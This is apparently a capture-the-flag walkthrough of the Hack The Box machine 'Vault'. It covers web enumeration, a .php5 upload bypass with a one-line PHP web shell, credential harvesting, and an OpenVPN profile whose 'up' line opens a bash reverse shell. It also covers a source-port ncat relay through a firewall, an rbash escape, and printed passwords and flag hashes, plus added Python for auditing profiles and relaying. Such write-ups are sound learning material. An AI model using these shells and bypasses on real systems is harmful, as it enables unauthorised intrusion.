---
Title: "Vault"
tags: "Linux"
---
# Recon Phase
## Nmap
~~~term
dang@dang-laptop ~/Documents/HTB/Frolic$ nmap -sV 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 18:48 GMT
Nmap scan report for 10.10.10.109
Host is up (0.024s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
1234/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
dang@dang-laptop ~/Documents/HTB/Frolic$
~~~
Again we find SSH and HTTP, plus 1234/tcp, which nmap can only report as tcpwrapped.
## HTTP Enumeration
A bit of hand enumeration of the site shows that there is something under the "sparklays" URL.
We also end up at login.php, which just says "Access denied".
Let's see what the http enumeration scripts bring up....
~~~term
dang@dang-laptop ~/Documents/HTB/Frolic$ nmap -sV --script=http-enum 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 18:50 GMT
Nmap scan report for 10.10.10.109
Host is up (0.024s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
dang@dang-laptop ~/Documents/HTB/Frolic$
~~~
Looking at the page, we see the term ```sparklays```. Perhaps something lives there...
The page under /sparklays/ is placeholder text, but it gives us a starting point for Nikto.
Nikto shows....
~~~term
$ nikto -host http://10.10.10.109/sparklays/
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-29786: /sparklays/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /sparklays/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /sparklays/admin.php: This might be interesting...
+ /sparklays/login.php: Admin login page/section found.
+ 7499 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2019-03-10 22:47:12 (GMT0) (491 seconds)
~~~
Admin page, but no creds.
Try gobuster against /sparklays with the dirb common wordlist, also asking for the .php, .html and .txt variant of each word:
~~~term
user@kali:/usr/share/wordlists/dirb$ gobuster -u http://10.10.10.109/sparklays -t 50 -w common.txt -x .php,.html,.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.109/sparklays/
[+] Threads : 50
[+] Wordlist : common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php,html,txt
[+] Timeout : 10s
=====================================================
2019/03/10 23:05:47 Starting gobuster
=====================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htaccess (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.hta (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/admin.php (Status: 200)
/admin.php (Status: 200)
/design (Status: 301)
/login.php (Status: 200)
=====================================================
2019/03/10 23:06:38 Finished
=====================================================
user@kali:/usr/share/wordlists/dirb$
~~~
> And FFS, learning more about CTF here: let's start enumerating deeper.
Let's also enumerate the design folder....
~~~term
user@kali:/usr/share/wordlists/dirb$ gobuster -u http://10.10.10.109/sparklays/design -t 50 -w common.txt -x .php,.html,.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.109/sparklays/design/
[+] Threads : 50
[+] Wordlist : common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : html,txt,php
[+] Timeout : 10s
=====================================================
2019/03/10 23:12:15 Starting gobuster
=====================================================
/.hta (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.hta.php (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/design.html (Status: 200)
/uploads (Status: 301)
=====================================================
2019/03/10 23:13:07 Finished
=====================================================
user@kali:/usr/share/wordlists/dirb$
~~~
Nice, we eventually get an HTML page. Going to
<http://10.10.10.109/sparklays/design/changelogo.php> lets us upload images.
We can then find them at ```http://10.10.10.109/sparklays/design/uploads/foo.jpg```
So we can upload .jpg, but the uploaded "images" come back with errors. Google for upload restriction bypasses:
- <https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf>
- <https://pentestlab.blog/2012/11/29/bypassing-file-upload-restrictions/>
Double-extension examples like this fail (the file is served as a broken image rather than executed):
~~~html
<img src="http://10.10.10.109/sparklays/design//uploads/foo.php.jpg" alt="The image “http://10.10.10.109/sparklays/design//uploads/foo.php.jpg” cannot be displayed because it contains errors.">
~~~
Let's work through the other file types suggested:
- png: rejected
- bmp: rejected
- jpg: accepted (but displays with errors, as above)
- txt: rejected
- php: rejected
- php5: accepted
So the upload filter blocks `.php` but not `.php5`, while Apache still hands `.php5` to the PHP module, so I can upload and run PHP scripts :)
It also looks like a phpinfo() page can be uploaded (although the rendering looks screwy).
## Getting a Shell
This time I felt like doing something slightly different to the
~~~term
cat foo.php5
<?php
// one-line web shell: run whatever is passed in the "evil" query parameter
system($_GET['evil']);
?>
~~~
Then going to ```http://10.10.10.109/sparklays/design/uploads/foo.php5?evil=ls```
gives me a directory listing :)
Possible password in:
```?evil=cat /home/dave/Desktop/key``` : itscominghome
And also in dave's Desktop/ssh file:
~~~
dave Dav3therav3123
~~~
And in Servers:
~~~
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x
~~~
However, **WHERE IS THE DAMN USER.TXT???**
No user.txt on this box plus a list of servers implies that the hosts above are only reachable internally, and that the flag lives further in.
## SSH into Dave
Looks like we found SSH credentials in the recon above (the Desktop/ssh file).
- user: dave
- password: Dav3therav3123
This lets us log in to 10.10.10.109 over SSH as dave.
# A Maze of tunnels all alike
We found a list of servers in ```~/dave/Servers```:
~~~
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x
~~~
Looks like we are going to have to pivot through this box.
- <https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html>
- <https://0xdf.gitlab.io/2018/06/10/intro-to-ssh-tunneling.html>
Nice one-liner for a ping sweep to check which of the hosts I have found are up:
~~~term
dave@ubuntu:~/.ssh$ for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done;
64 bytes from 192.168.122.1: icmp_seq=1 ttl=64 time=0.065 ms
64 bytes from 192.168.122.4: icmp_seq=1 ttl=64 time=0.758 ms
64 bytes from 192.168.122.5: icmp_seq=1 ttl=64 time=0.881 ms
dave@ubuntu:~/.ssh$
~~~
What else is open?
(-z: report open ports rather than sending data to them; -v: print each result)
~~~term
nc -zv 192.168.122.4 1-1023
~~~
## DNS Server
We know that the DNS server has an HTTP port open.
Set up tunnels to forward it: first on the Ubuntu box as dave (ssh back into itself, forwarding local 4242 to 192.168.122.4:80), then from my laptop to that local port.
~~~term
$dave ssh -L 4242:192.168.122.4:80 dave@10.10.10.109
$dang ssh -L 4242:localhost:4242 dave@10.10.10.109
~~~
> NOTE: I realise I could cut out a step by forwarding 192.168.122.4:80 straight to my laptop in one hop,
> i.e. running ```ssh -L 4242:192.168.122.4:80 dave@10.10.10.109``` from my side only.
The main page shows a DNS config and an OpenVPN checker.
Enumerate the rest of the web site with gobuster:
~~~term
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/notes (Status: 200)
/server-status (Status: 403)
~~~
The notes file contains:
~~~
chmod 123.ovpn and script.sh to 777
~~~
And we also find 123.ovpn:
~~~
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"
~~~
and script.sh:
~~~
#!/bin/bash
sudo openvpn 123.ovpn
~~~
This may also be our way forward...
<https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da>
So the OpenVPN config, once the tunnel comes up, runs its `up` command, which is a bash reverse shell back to ```192.168.122.1``` on port ```2323```. `script-security 2` is what allows an `up` directive to run an arbitrary command, and script.sh runs the whole thing as root via sudo. 192.168.122.1 is the Ubuntu box we already have a shell on (it answered the ping sweep above), so that is where the listener goes.
That's a really nifty trick :P
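Before handing an untrusted profile to `sudo openvpn`, the thing to check is exactly what 123.ovpn abuses: any directive that makes openvpn execute a program. The Python below is an added example, not code from the page or from OpenVPN: a small profile auditor that parses the option lines, flags `script-security` levels of 2 or higher and every command-running directive listed in openvpn(8) (`up`, `down`, `route-up`, `tls-verify`, `client-connect` and friends, plus `plugin`, which loads a shared object), and reports what would run. The sample profile embedded in it is the 123.ovpn shown above; the "clean" profile in the usage check is constructed for contrast.

```python
import re
import shlex

# Directives that make openvpn run an external command (see openvpn(8)); each is
# a code-execution sink if the profile is attacker-controlled.
EXEC_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect",
    "learn-address",
}
# "plugin" loads a shared object into the openvpn process instead of a script.
LOAD_DIRECTIVES = {"plugin"}

# The profile found on the DNS box, embedded verbatim as the sample input.
SAMPLE_OVPN = """remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"
"""


def parse_ovpn(text):
    """Yield (directive, args) per option line; inline <ca>...</ca> style blocks are skipped."""
    in_block = None
    for raw in text.splitlines():
        line = raw.strip()
        if in_block:
            if line == "</%s>" % in_block:
                in_block = None
            continue
        if not line or line[0] in "#;":
            continue
        block = re.match(r"<([a-z-]+)>$", line)
        if block:
            in_block = block.group(1)
            continue
        try:
            # shlex honours the quoting openvpn uses for "up" command strings
            parts = shlex.split(line)
        except ValueError:
            parts = line.split()
        if parts:
            yield parts[0].lower(), parts[1:]


def audit_ovpn(text):
    """Return human-readable findings for everything in the profile that executes code."""
    findings = []
    for directive, args in parse_ovpn(text):
        if (directive == "script-security" and args
                and args[0].isdigit() and int(args[0]) >= 2):
            findings.append("script-security %s enables user-defined scripts" % args[0])
        elif directive in EXEC_DIRECTIVES:
            findings.append("%s executes: %s" % (directive, " ".join(args)))
        elif directive in LOAD_DIRECTIVES:
            findings.append("plugin loads shared object: %s" % " ".join(args))
    return findings


def is_safe_to_run(text):
    """True only when no directive in the profile would run code on the client."""
    return not audit_ovpn(text)


if __name__ == "__main__":
    for finding in audit_ovpn(SAMPLE_OVPN):
        print("[!]", finding)
    print("safe to run:", is_safe_to_run(SAMPLE_OVPN))
```

A `route-up` or `tls-verify` line is reported even when the profile sets `script-security 1` (openvpn would refuse to run it), because the point of the audit is that someone put a command in the file at all; and a directive hidden inside an inline `<ca>` block is ignored, since openvpn treats that as certificate data rather than options.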
So let's see if the configurator on the website actually works.
Upload the 123.ovpn file, with a netcat listener waiting on the Ubuntu box as dave (port 2323):
~~~term
Last login: Thu Mar 14 15:41:03 2019 from 10.10.10.109
dave@ubuntu:~$ nc -nvlp 2323
Listening on [0.0.0.0] (family 0, port 2323)
Connection from [192.168.122.4] port 2323 [tcp/*] accepted (family 2, sport 58896)
bash: cannot set terminal process group (1093): Inappropriate ioctl for device
bash: no job control in this shell
root@DNS:/var/www/html#
~~~
And it gives us the user flag !!!
~~~term
root@DNS:/home/dave# cat user.txt
cat user.txt
a4947faa8d4e1f80771d34234bd88c73
~~~
I also think I have dave's SSH password for this box, so I don't need to repeat the OpenVPN trick.
Dave also has sudo, so happy days there if we lose the connection..
- user: dave
- password: dav3gerous567
# On the DNS Box
Rummaging around on the DNS box.
Not a huge amount here in terms of files.
In /var/www/DNS we have a copy of the interfaces config:
~~~term
auto ens3
iface ens3 inet static
address 192.168.122.4
netmask 255.255.255.0
up route add -net 192.168.5.0 netmask 255.255.255.0 gw 192.168.122.5
up route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.28
~~~
Which gives us a clue as to the addresses we are looking at: 192.168.5.0/24 is routed via the Firewall box (192.168.122.5), so whatever lives there sits behind it.
We also have Alex (who probably set this up...), with stuff in his .bash_history:
~~~term
ping 192.168.5.2
su root
nc -lvp 8888
exit
~~~
If we take a look at 192.168.5.2 we get something interesting.
~~~term
Starting Nmap 7.01 ( https://nmap.org ) at 2019-03-14 23:18 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0030s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
53/tcp closed domain
4444/tcp closed krb524
~~~
I think the firewall is blocking stuff.... Everything is filtered (dropped) except 53 and 4444, which come back as closed: packets for those two ports are let through to the Vault, which answers with a RST. That is a hint about which ports the firewall trusts.
Poking around more, in auth.log there is:
~~~term
Sep 2 15:07:51 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Sep 2 15:07:51 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0)
Sep 2 15:08:55 DNS sudo: pam_unix(sudo:session): session closed for user root
Sep 2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session opened for user root by (uid=0)
Sep 2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session closed for user root
Sep 2 15:10:20 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
Sep 2 15:10:20 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0)
Sep 2 15:10:34 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53
~~~
We can nmap the server and, if we pretend we are coming from source port 4444 (with fragmented packets, as in the log), we find something that is open:
~~~term
root@DNS:/var/log# nmap 192.168.5.2 -Pn --source-port=4444 -f
Starting Nmap 7.01 ( https://nmap.org ) at 2019-03-14 23:28 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0035s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
987/tcp open unknown
~~~
Rough idea of what is going on with the ncat commands from auth.log:
- Listen on port 1234 (and later 3333) on the DNS box
- For each connection, spawn a second ncat to 192.168.5.2 port 987 with -p (source port) 53
- The firewall only passes traffic to 987 when it comes from source port 53, just as it only let the nmap scan through from source port 4444
We can confirm this: connecting to 987 from source port 53 gets an SSH banner back. The ls/whoami I typed into it are rejected with "Protocol mismatch", which is what sshd says to non-SSH input.
~~~term
root@DNS:/var/log# ncat -nv 192.168.5.2 987 -p 53
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.5.2:987.
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
ls
Protocol mismatch.
whoami
~~~
So SSH to the Vault is reachable, but only via the source-port trick. The ncat relay from auth.log gives us a local port that does it for us. Run it as root on DNS, since binding source port 53 is privileged; without -k it serves a single connection and then exits:
~~~term
ncat -nlv 1234 --sh-exec "/usr/bin/ncat -nv 192.168.5.2 987 -p 53"
~~~
Then we SSH in to Vault (via localhost) using port 1234 (ssh takes a lowercase -p for the port; -P is scp's):
~~~term
ssh dave@127.0.0.1 -p 1234
~~~
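What the `ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 53"` pair does is a source-port relay: the listener takes an ordinary local connection and re-originates it from the one source port the firewall trusts. The Python below is an added example, not code from the page or from ncat: a one-shot relay that binds its outbound socket to a chosen source port before connecting (53 needs root, exactly like `-p 53`), then splices bytes in both directions. `demo()` is a constructed local round trip through an echo server, using the unprivileged source port 40053 (an assumption; any free high port would do) so it runs without root and shows the far end seeing the fixed source port.

```python
import socket
import threading


def connect_from_source_port(host, port, src_port, timeout=5.0):
    """TCP connect to host:port originating from local port src_port.
    Ports below 1024 (e.g. 53) need root; SO_REUSEADDR lets the same source
    port be reused while an earlier connection from it is in TIME_WAIT."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.settimeout(timeout)
    s.bind(("", src_port))
    s.connect((host, port))
    return s


def _pump(src, dst):
    """Copy bytes src -> dst until EOF or error, then tear both sides down."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for sock in (src, dst):
            try:
                sock.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass


def relay_once(listen_port, target_host, target_port, src_port, ready=None):
    """Accept one client on 127.0.0.1:listen_port and splice it to the target,
    originating the upstream leg from src_port (the ncat -l/--sh-exec pattern).
    Returns the source port actually used for the upstream connection."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind(("127.0.0.1", listen_port))
    lsock.listen(1)
    if ready is not None:
        ready.set()  # tell the caller it is safe to connect
    client, _ = lsock.accept()
    lsock.close()
    client.settimeout(10)
    upstream = connect_from_source_port(target_host, target_port, src_port)
    used_port = upstream.getsockname()[1]
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()
    return used_port


def _free_port():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo(src_port=40053):
    """Constructed local round trip: client -> relay -> echo server.
    Returns (bytes echoed back, source port the server saw, port the relay used)."""
    seen = {}
    echo = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    echo.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    echo.bind(("127.0.0.1", 0))
    echo.listen(1)
    echo_port = echo.getsockname()[1]

    def serve_once():
        conn, addr = echo.accept()
        seen["port"] = addr[1]  # this is what the firewall's rule looks at
        conn.sendall(conn.recv(4096))
        conn.close()
        echo.close()

    threading.Thread(target=serve_once, daemon=True).start()
    listen_port = _free_port()
    ready = threading.Event()
    result = {}
    relay = threading.Thread(
        target=lambda: result.setdefault(
            "used", relay_once(listen_port, "127.0.0.1", echo_port, src_port, ready)),
        daemon=True)
    relay.start()
    ready.wait(5)
    client = socket.create_connection(("127.0.0.1", listen_port), timeout=5)
    client.sendall(b"SSH-2.0-probe\r\n")  # constructed stand-in for the ssh client
    reply = client.recv(4096)
    client.close()
    relay.join(5)
    return reply, seen.get("port"), result.get("used")


if __name__ == "__main__":
    print(demo())
```

Against the real target this would be `relay_once(1234, "192.168.5.2", 987, 53)` run as root on the DNS box, after which `ssh -p 1234 dave@127.0.0.1` works just as with the ncat version; like the ncat one-liner without `-k`, it handles a single connection, so it has to be restarted for each ssh or scp session.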
Our next issue is being stuck in rbash FFS.
We can escape that from ```less```: open any file with less, then type ```!/bin/bash``` at its prompt.
If we kill the connection (which also ends the one-shot ncat relay, so restart it) we can do a reverse scp through the same relay to grab the encrypted file:
~~~term
dave@DNS:~$ scp -P 1234 dave@127.0.0.1:/home/dave/root.txt.gpg .
The authenticity of host '[127.0.0.1]:1234 ([127.0.0.1]:1234)' can't be established.
ECDSA key fingerprint is SHA256:Wo70Zou+Hq5m/+G2vuKwUnJQ4Rwbzlqhq2e1JBdjEsg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:1234' (ECDSA) to the list of known hosts.
dave@127.0.0.1's password:
~~~
Store it as a hexdump as a backup. (Plain ```hexdump``` prints 16-bit little-endian words, so the bytes appear swapped in pairs; ```xxd``` gives a byte-accurate dump that ```xxd -r``` can turn back into the file.)
~~~term
root@DNS:/home/dave# hexdump root.txt.gpg
0000000 0285 030c 78c7 10c6 ebd1 031f 1001 a000
0000010 ea98 1ad3 6e36 497e 8d7d e8d0 1543 3966
0000020 5030 c9ae cc3d 1214 51bd 4c35 f27d 354e
0000030 e1a0 b65d 31e8 3c52 4907 719f 15f4 b23d
0000040 7a98 a1f7 94e1 4fa9 463b ecae 8537 1acb
0000050 158f d1b8 27d8 a170 4f3f ff05 b92f 3321
0000060 a512 b665 2af0 58df 6dd0 547a 0d48 c580
0000070 a384 f5dd 088a 0809 c53d 4d01 0937 7602
0000080 d09c 2643 505e cd10 26d0 51bc fb14 51d0
0000090 ca91 0d49 582a c557 21b6 fe07 c97e d7e1
00000a0 5c88 9b73 6557 5706 63d2 2eed 185c 5256
00000b0 e36a 2918 7c57 9ce7 eb9a 4895 260a 2aa9
00000c0 ad86 db62 44f2 be00 9754 3959 cf6a 6b47
00000d0 7c53 f729 99e3 2cf1 14ad f125 b934 ba34
00000e0 de02 6965 0fdf 5f74 d842 2087 47dc c73e
00000f0 353f 74df 1df3 e133 34bd f545 8ecd e91c
0000100 f5ca 13b3 2d9d 54ca b6c1 8a78 7bd7 305e
0000110 ef80 7650 d7dc ed1d e2e9 602c 12a4 dab0
0000120 4656 f261 b886 220f ef06 f1c6 54a8 82c3
0000130 974e 7eac cfa9 d1d5 105e 49c1 c299 327b
0000140 d13d 1b69 67c4 389c 361e 0370 1ab0 874b
0000150 7472 e385 9787 3e0d 62b4 615f bbe9 65d1
0000160 1051 7f17 f5f7 bee7 c69c e596 4fbe 6c9d
0000170 6fc6 c2f3 44e2 64f7 9637 2861 a0a5 9a5e
0000180 c3e6 0cb0 82ed fa2f a6a2 0570 3f3e b614
0000190 6b18 2708 8f10 d18a 6c1f 7ade 321e f8f5
00001a0 9b77 b771 0fed f694 6053 3ca6 d2e3 d57c
00001b0 f809 acdd 6fc4 ce52 b762 291c 068f 37b1
00001c0 b6aa 59ab 7b31 e150 2c3c 00da 4b78 b54f
00001d0 ee9e a19d d4c5 d7a3 e023 f479 27b3 467f
00001e0 d810 2309 db57 314c 331a 243c b63e 23b8
00001f0 2263 2124 8115 d599 dadb 1c11 2bf6 6b98
0000200 c71f 528b 1c90 b4ba b795 6fe3 f3ec d2c7
0000210 0164 4470 ba76 d10b afeb 92b1 e756 2728
0000220 f69c d290 3e80 bf74 4971 7381 9d73 9978
0000230 c54c f3d7 3341 722e fc6b 0cf7 3620 8d02
0000240 ee2c 99b0 6921 54a5 a667 c462 01f8 0868
0000250 a04a 94fc d4bd 66de 1656 904f 167c 5fe9
0000260 0b78 0513 7cff 4c6a a9c2 17cc 11dd b41a
0000270 6630 8f22 00df
0000275
~~~
We need the secret key; gpg tells us which one:
~~~term
root@DNS:/home/dave# gpg root.txt.gpg
gpg: directory `/root/.gnupg' created
gpg: new configuration file `/root/.gnupg/gpg.conf' created
gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/root/.gnupg/secring.gpg' created
gpg: keyring `/root/.gnupg/pubring.gpg' created
gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available
root@DNS:/home/dave#
~~~
Check what keys are available. Not on the DNS server: gpg --list-secret-keys prints nothing.
~~~term
root@DNS:/var/log# gpg --list-secret-keys
gpg: /root/.gnupg/trustdb.gpg: trustdb created
root@DNS:/var/log# gpg --list-secret-keys
~~~
The key does appear to be on the first server (dave's keyring on the Ubuntu box) :)
And the passphrase is "itscominghome", which we found about 2 days ago in the recon part. Copy root.txt.gpg over there and decrypt it:
~~~term
dave@ubuntu:/tmp$ gpg root.txt.gpg
You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
"david <dave@david.com>"
dave@ubuntu:/tmp$ ls
root.txt systemd-private-215c6f7f4c04468996eb09264769d510-colord.service-fzn51m systemd-private-215c6f7f4c04468996eb09264769d510-systemd-timesyncd.service-Cstw1F vmware-root
root.txt.gpg systemd-private-215c6f7f4c04468996eb09264769d510-rtkit-daemon.service-mNFDbm VMwareDnD
dave@ubuntu:/tmp$ cat root.txt
ca468370b91d1f5906e31093d9bfe819
dave@ubuntu:/tmp$
~~~
## RABBIT: Hidden text file
There is also a .root.txt.swp.
Turns out it's a vim swap file.
May be able to recover it with ```vim -r``` (doesn't work).
However, apparently the file is being edited by dave in process 4872. Can we grab that process?